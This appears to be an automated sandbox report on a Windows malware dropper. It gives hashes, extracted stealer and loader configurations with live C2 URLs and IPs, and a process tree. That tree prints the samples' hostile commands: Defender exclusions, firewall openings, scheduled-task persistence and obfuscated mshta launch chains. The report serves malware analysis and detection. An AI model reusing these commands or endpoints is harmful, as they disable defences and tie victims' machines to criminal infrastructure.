Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Resubmissions
10/11/2021, 14:50
211110-r7nbvaeddr 1008/11/2021, 16:12
211108-tnmmbahgaj 1008/11/2021, 15:26
211108-svdsbaccf6 1008/11/2021, 14:48
211108-r6lfvshdfn 10Analysis
-
max time kernel
67s -
max time network
165s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
08/11/2021, 14:48
General
-
Target
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
-
Size
403KB
-
MD5
f957e397e71010885b67f2afe37d8161
-
SHA1
a8bf84b971b37ac6e7f66c5e5a7e971a7741401e
-
SHA256
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66
-
SHA512
8b5e9cb926fafc295c403c1fce7aa883db3a327e58c3295e9a081a8937bed28e305cca08c2c7d98080818095ea99bb4047e10aa2f61e3e4d6d965aef6d16a4f6
Score
10/10
Malware Config
Extracted
Family
socelars
C2
http://www.hhgenice.top/
Extracted
Family
xloader
Version
2.5
Campaign
s0iw
C2
http://www.kyiejenner.com/s0iw/
Decoy
ortopediamodelo.com
orimshirts.store
universecatholicweekly.info
yvettechan.com
sersaudavelsempre.online
face-booking.net
europeanretailgroup.com
umofan.com
roemahbajumuslim.online
joyrosecuisine.net
3dmaker.house
megdb.xyz
stereoshopie.info
gv5rm.com
tdc-trust.com
mcglobal.club
choral.works
onlineconsultantgroup.com
friscopaintandbody.com
midwestii.com
Extracted
Family
raccoon
Version
1.8.3-hotfix
Botnet
19425a9ea527ab0b3a94d8156a7d2f62d79d3b73
Attributes
-
url4cnc
http://91.219.236.162/bimboDinotrex
http://185.163.47.176/bimboDinotrex
http://193.38.54.238/bimboDinotrex
http://74.119.192.122/bimboDinotrex
http://91.219.236.240/bimboDinotrex
https://t.me/bimboDinotrex
rc4.plain
rc4.plain
Extracted
Family
redline
C2
45.9.20.149:10844
Extracted
Family
redline
Botnet
udptest
C2
193.56.146.64:65441
Extracted
Family
vidar
Version
47.9
Botnet
937
C2
https://mas.to/@kirpich
Attributes
-
profile_id
937
Extracted
Family
smokeloader
Version
2020
C2
http://misha.at/upload/
http://roohaniinfra.com/upload/
http://0axqpcc.cn/upload/
http://mayak-lombard.ru/upload/
http://mebel-lass.ru/upload/
http://dishakhan.com/upload/
rc4.i32
rc4.i32
Extracted
Family
vidar
Version
47.9
Botnet
933
C2
https://mas.to/@kirpich
Attributes
-
profile_id
933
Signatures
-
Gozi, Gozi IFSB
Gozi ISFB is a well-known and widely distributed banking trojan.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Raccoon
Simple but powerful infostealer which was very active in 2019.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 6 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Socelars Payload 2 IoCs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Xloader
Xloader is a rebranded version of Formbook malware.
-
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
-
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
-
Vidar Stealer 3 IoCs
-
Xloader Payload 2 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 14 IoCs
-
Modifies Windows Firewall 1 TTPs
-
VMProtect packed file 3 IoCs
Detects executables packed with VMProtect commercial packer.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer 6 IoCs
Detects Themida, an advanced Windows software protection system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 7 IoCs
-
NSIS installer 4 IoCs
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Kills process with taskkill 3 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 34 IoCs
-
Suspicious use of WriteProcessMemory 43 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe"C:\Users\Admin\AppData\Local\Temp\022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe"1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Pictures\Adobe Films\n3Tp8gFuqr5b2BLwWc7xUFAZ.exe"C:\Users\Admin\Pictures\Adobe Films\n3Tp8gFuqr5b2BLwWc7xUFAZ.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\Pictures\Adobe Films\PlcErVoRHEB8WDCnEhxZNLfo.exe"C:\Users\Admin\Pictures\Adobe Films\PlcErVoRHEB8WDCnEhxZNLfo.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\bvC0aBrVoiYJT2jZm8LdRil0.exe"C:\Users\Admin\Pictures\Adobe Films\bvC0aBrVoiYJT2jZm8LdRil0.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\wFfzQhAyb9nNxvhU9xe3f5x4.exe"C:\Users\Admin\Pictures\Adobe Films\wFfzQhAyb9nNxvhU9xe3f5x4.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\5l8ybXjb8Hy1OvCnudFUD2l8.exe"C:\Users\Admin\Pictures\Adobe Films\5l8ybXjb8Hy1OvCnudFUD2l8.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
-
-
C:\Users\Admin\Documents\HNwrGPZhSvHpbgn0tQWPOxiQ.exe"C:\Users\Admin\Documents\HNwrGPZhSvHpbgn0tQWPOxiQ.exe"3⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\_Vm4titsrpvfv_Cfz_F9R_dZ.exe"C:\Users\Admin\Pictures\Adobe Films\_Vm4titsrpvfv_Cfz_F9R_dZ.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\s1Ulg9ILOOmPW7fR22bhRf_C.exe"C:\Users\Admin\Pictures\Adobe Films\s1Ulg9ILOOmPW7fR22bhRf_C.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\s1Ulg9ILOOmPW7fR22bhRf_C.exe"C:\Users\Admin\Pictures\Adobe Films\s1Ulg9ILOOmPW7fR22bhRf_C.exe"3⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\gLt8wI1OI_X3ODtTGkM_mYnp.exe"C:\Users\Admin\Pictures\Adobe Films\gLt8wI1OI_X3ODtTGkM_mYnp.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Pictures\Adobe Films\alNDOulU6UA92LJpYj8VwkbB.exe"C:\Users\Admin\Pictures\Adobe Films\alNDOulU6UA92LJpYj8VwkbB.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 348 -s 15683⤵
- Program crash
-
-
-
C:\Users\Admin\Pictures\Adobe Films\082l3_AoyLqJozglbfWQ3K9A.exe"C:\Users\Admin\Pictures\Adobe Films\082l3_AoyLqJozglbfWQ3K9A.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\082l3_AoyLqJozglbfWQ3K9A.exe"C:\Users\Admin\Pictures\Adobe Films\082l3_AoyLqJozglbfWQ3K9A.exe"3⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\BWvifOluhbdVL7uVYPRyFdCe.exe"C:\Users\Admin\Pictures\Adobe Films\BWvifOluhbdVL7uVYPRyFdCe.exe"2⤵
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \3⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\3⤵
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes3⤵
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes3⤵
-
-
C:\Windows\System\svchost.exe"C:\Windows\System\svchost.exe" formal3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \4⤵
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes4⤵
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes4⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\4⤵
-
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM3⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\Pictures\Adobe Films\UW7uXv2QjMlJPvjZEVNXbXzd.exe"C:\Users\Admin\Pictures\Adobe Films\UW7uXv2QjMlJPvjZEVNXbXzd.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\gxJ1shjEWNmorQACeSGEJnDg.exe"C:\Users\Admin\Pictures\Adobe Films\gxJ1shjEWNmorQACeSGEJnDg.exe"2⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"3⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\8n4QpLYx11mbjWKzT1riKHm7.exe"C:\Users\Admin\Pictures\Adobe Films\8n4QpLYx11mbjWKzT1riKHm7.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\WW1Soft.exe"C:\Users\Admin\AppData\Local\Temp\WW1Soft.exe"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"3⤵
-
C:\Users\Admin\AppData\Local\5919063.exe"C:\Users\Admin\AppData\Local\5919063.exe"4⤵
-
-
C:\Users\Admin\AppData\Local\6615391.exe"C:\Users\Admin\AppData\Local\6615391.exe"4⤵
-
-
C:\Users\Admin\AppData\Local\3674906.exe"C:\Users\Admin\AppData\Local\3674906.exe"4⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRIpt: cLosE ( CreateOBjEct ( "WsCrIpT.shelL" ). Run ( "cMD /q /c cOPy /Y ""C:\Users\Admin\AppData\Local\3674906.exe"" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i & IF """" == """" for %Z iN ( ""C:\Users\Admin\AppData\Local\3674906.exe"" ) do taskkill -f -Im ""%~NXZ"" ", 0, TRUE ) )5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c cOPy /Y "C:\Users\Admin\AppData\Local\3674906.exe" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i &IF "" == "" for %Z iN ( "C:\Users\Admin\AppData\Local\3674906.exe" ) do taskkill -f -Im "%~NXZ"6⤵
-
-
-
-
C:\Users\Admin\AppData\Local\4586976.exe"C:\Users\Admin\AppData\Local\4586976.exe"4⤵
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"5⤵
-
-
-
C:\Users\Admin\AppData\Local\6969289.exe"C:\Users\Admin\AppData\Local\6969289.exe"4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\liuchang-game.exe"C:\Users\Admin\AppData\Local\Temp\liuchang-game.exe"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"3⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"5⤵
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi6⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"8⤵
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "search_hyperfs_206.exe"6⤵
- Kills process with taskkill
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\is-6918G.tmp\setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-6918G.tmp\setup.tmp" /SL5="$102AA,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT5⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\askinstall25.exe"C:\Users\Admin\AppData\Local\Temp\askinstall25.exe"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4488 -s 6564⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4488 -s 6684⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4488 -s 6724⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4488 -s 6844⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\chrome update.exe"C:\Users\Admin\AppData\Local\Temp\chrome update.exe"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\chrome2.exe"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\chrome1.exe"C:\Users\Admin\AppData\Local\Temp\chrome1.exe"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"3⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\QOuEBFzOMIfUDYz7ij2u_fba.exe"C:\Users\Admin\Pictures\Adobe Films\QOuEBFzOMIfUDYz7ij2u_fba.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "QOuEBFzOMIfUDYz7ij2u_fba.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\QOuEBFzOMIfUDYz7ij2u_fba.exe" & exit3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "QOuEBFzOMIfUDYz7ij2u_fba.exe" /f4⤵
- Kills process with taskkill
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\9XkBG2Fij6lRQQg2VdDCFVDq.exe"C:\Users\Admin\Pictures\Adobe Films\9XkBG2Fij6lRQQg2VdDCFVDq.exe"2⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\RDUUnu6sCbpiWGkN78DH5kei.exe"C:\Users\Admin\Pictures\Adobe Films\RDUUnu6sCbpiWGkN78DH5kei.exe"2⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\68e2VhFSAP0FRPMi5EQ4pv5v.exe"C:\Users\Admin\Pictures\Adobe Films\68e2VhFSAP0FRPMi5EQ4pv5v.exe"2⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\68e2VhFSAP0FRPMi5EQ4pv5v.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\68e2VhFSAP0FRPMi5EQ4pv5v.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\68e2VhFSAP0FRPMi5EQ4pv5v.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\68e2VhFSAP0FRPMi5EQ4pv5v.exe" ) do taskkill -im "%~NxK" -F4⤵
-
C:\Users\Admin\AppData\Local\Temp\8pWB.eXE8pWB.eXe /pO_wtib1KE0hzl7U9_CYP5⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F7⤵
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "68e2VhFSAP0FRPMi5EQ4pv5v.exe" -F5⤵
- Kills process with taskkill
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\s2BraH1hwSN7ptT8LosdeIhg.exe"C:\Users\Admin\Pictures\Adobe Films\s2BraH1hwSN7ptT8LosdeIhg.exe"2⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\XJIx4bsaRMD60GuFjnfMnAwT.exe"C:\Users\Admin\Pictures\Adobe Films\XJIx4bsaRMD60GuFjnfMnAwT.exe"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\XJIx4bsaRMD60GuFjnfMnAwT.exe" & exit3⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\X18gHmQuxYkxHF4yyIXSTF1v.exe"C:\Users\Admin\Pictures\Adobe Films\X18gHmQuxYkxHF4yyIXSTF1v.exe"2⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\xTqlEgwCYq9KaBFguTTHn165.exe"C:\Users\Admin\Pictures\Adobe Films\xTqlEgwCYq9KaBFguTTHn165.exe"2⤵
-
C:\Users\Admin\Pictures\Adobe Films\xTqlEgwCYq9KaBFguTTHn165.exe"C:\Users\Admin\Pictures\Adobe Films\xTqlEgwCYq9KaBFguTTHn165.exe"3⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\fAxb2uj1hqYE940HxUi2Oq8V.exe"C:\Users\Admin\Pictures\Adobe Films\fAxb2uj1hqYE940HxUi2Oq8V.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\Underdress.exeC:\Users\Admin\AppData\Roaming\Underdress.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\Unseduceability.exe"C:\Users\Admin\AppData\Local\Temp\Unseduceability.exe"4⤵
-
-
-
C:\Users\Admin\AppData\Roaming\MegogoSell_crypted.exeC:\Users\Admin\AppData\Roaming\MegogoSell_crypted.exe3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"4⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 772 -s 5524⤵
- Program crash
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\fQ3PKz0AGUetIsFf1bPP0E8B.exe"C:\Users\Admin\Pictures\Adobe Films\fQ3PKz0AGUetIsFf1bPP0E8B.exe"2⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\Sl1_ExVycKO8zgHCVnimQ8b5.exe"C:\Users\Admin\Pictures\Adobe Films\Sl1_ExVycKO8zgHCVnimQ8b5.exe"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1352 -s 8923⤵
- Program crash
-
-
-
C:\Users\Admin\Pictures\Adobe Films\rbleiDRuuTxWNVSwHhQLgw9o.exe"C:\Users\Admin\Pictures\Adobe Films\rbleiDRuuTxWNVSwHhQLgw9o.exe"2⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\i2M5jnBZQI0VGz8B0Jb920CZ.exe"C:\Users\Admin\Pictures\Adobe Films\i2M5jnBZQI0VGz8B0Jb920CZ.exe"2⤵
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"1⤵
-
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\Pictures\Adobe Films\UW7uXv2QjMlJPvjZEVNXbXzd.exe"2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\is-OV261.tmp\setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-OV261.tmp\setup.tmp" /SL5="$202C0,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT1⤵
-
C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe"C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe" /q /norestart2⤵
-
C:\b19e86d2a6a5072ffa94\Setup.exeC:\b19e86d2a6a5072ffa94\\Setup.exe /q /norestart /x86 /x64 /web3⤵
-
-
-
C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe"C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe" ss12⤵
-
-
C:\Users\Admin\AppData\Local\Temp\is-C6637.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-C6637.tmp\postback.exe" ss12⤵
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
868KB
-
Filesize
496KB
-
Filesize
184KB
-
Filesize
696KB
-
Filesize
8KB
-
Filesize
176KB
-
Filesize
172KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
5.1MB
-
Filesize
5.1MB
-
Filesize
5.1MB
-
Filesize
5.1MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
1.6MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
384KB
-
Filesize
8KB
-
Filesize
68KB
-
Filesize
264KB
-
Filesize
36KB
-
Filesize
36KB
-
Filesize
156KB
-
Filesize
4KB
-
Filesize
1.6MB
-
Filesize
80KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
80KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
100KB
-
Filesize
184KB
-
Filesize
380KB
-
Filesize
16.0MB
-
Filesize
88KB
-
Filesize
696KB
-
Filesize
1.3MB
-
Filesize
3.1MB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
856KB
-
Filesize
1.3MB
-
Filesize
868KB
-
Filesize
32KB
-
Filesize
6.0MB
-
Filesize
424KB
-
Filesize
1.3MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
80KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
72KB
-
Filesize
64KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
8KB